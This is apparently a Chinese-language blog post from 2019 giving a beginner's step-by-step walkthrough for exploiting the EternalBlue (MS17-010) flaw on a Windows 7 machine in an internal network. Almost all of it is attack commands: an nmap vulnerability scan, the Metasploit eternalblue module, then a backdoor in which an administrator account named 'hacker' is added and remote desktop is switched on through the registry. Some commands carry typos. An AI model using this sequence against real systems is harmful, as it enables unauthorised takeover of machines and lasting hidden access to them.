---
layout:     post
title:      永恒之蓝漏洞拿win7最高权限
subtitle:   新手上路，内网win7永恒之蓝漏洞利用
date:       2019-3-18
author:     陈建武
header-img: img/post-bg-re-vs-ng2.jpg
catalog: true
tags:
    - Blog
---

> 新手上路，大佬勿喷。

# 进入正题

1.进入nmap存放脚本的目录。

命令：cd /usr/share/nmap/scripts

updatedb

locate ms17-010

![](https://s2.ax1x.com/2019/03/18/An1eu8.png)

上图就是我们要利用的脚本

2.用脚本扫描你要攻击的目标ip

命令：nmap --scriput smb-vuln-ms17-010.nse ‘这里写目标ip’

![](https://s2.ax1x.com/2019/03/18/An1Vjf.png)

3.再开启一个终端运行msf工具。

命令：mafconsole

![](https://s2.ax1x.com/2019/03/18/An1k9I.png)

4.查询这个漏洞利用模块。

命令：search ms17-010

![](https://s2.ax1x.com/2019/03/18/An1EgP.png)

5.使用这个模块。

命令：use exploit/windows/smb/ms17_010_eternalblue

6.查看需要设置的参数。

命令：show options

![](https://s2.ax1x.com/2019/03/18/An1rgx.png)

7.设置远程目标的ip

命令：set rhost ‘这里写远程目标的ip’

8.再次查看参数设置。

命令：show options

![](https://s2.ax1x.com/2019/03/18/An1gbD.png)

9.启动。

命令：run

![](https://s2.ax1x.com/2019/03/18/An1oxP.png)

10.‘留后门’添加用户。

命令：net user hacker 123.com /add

查看用户是否添加成功。

命令：net user

![](https://s2.ax1x.com/2019/03/18/An1xGn.png)

11.给我们添加的用户提权。

命令:net localgroup administrators hacker /add

查看提权是否成功。

命令：net user hacker

![](net localgroup administrators hacker /add)

12.开起目标机器3389远程桌面服务端口。

命令：REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

13.打开成功后再开启一个终端，链接远程桌面，

命令：rdesktop ‘你目标机的ip’

![](https://s2.ax1x.com/2019/03/19/An3dL8.png)

14.完成。

![](https://s2.ax1x.com/2019/03/19/An3bS1.png)






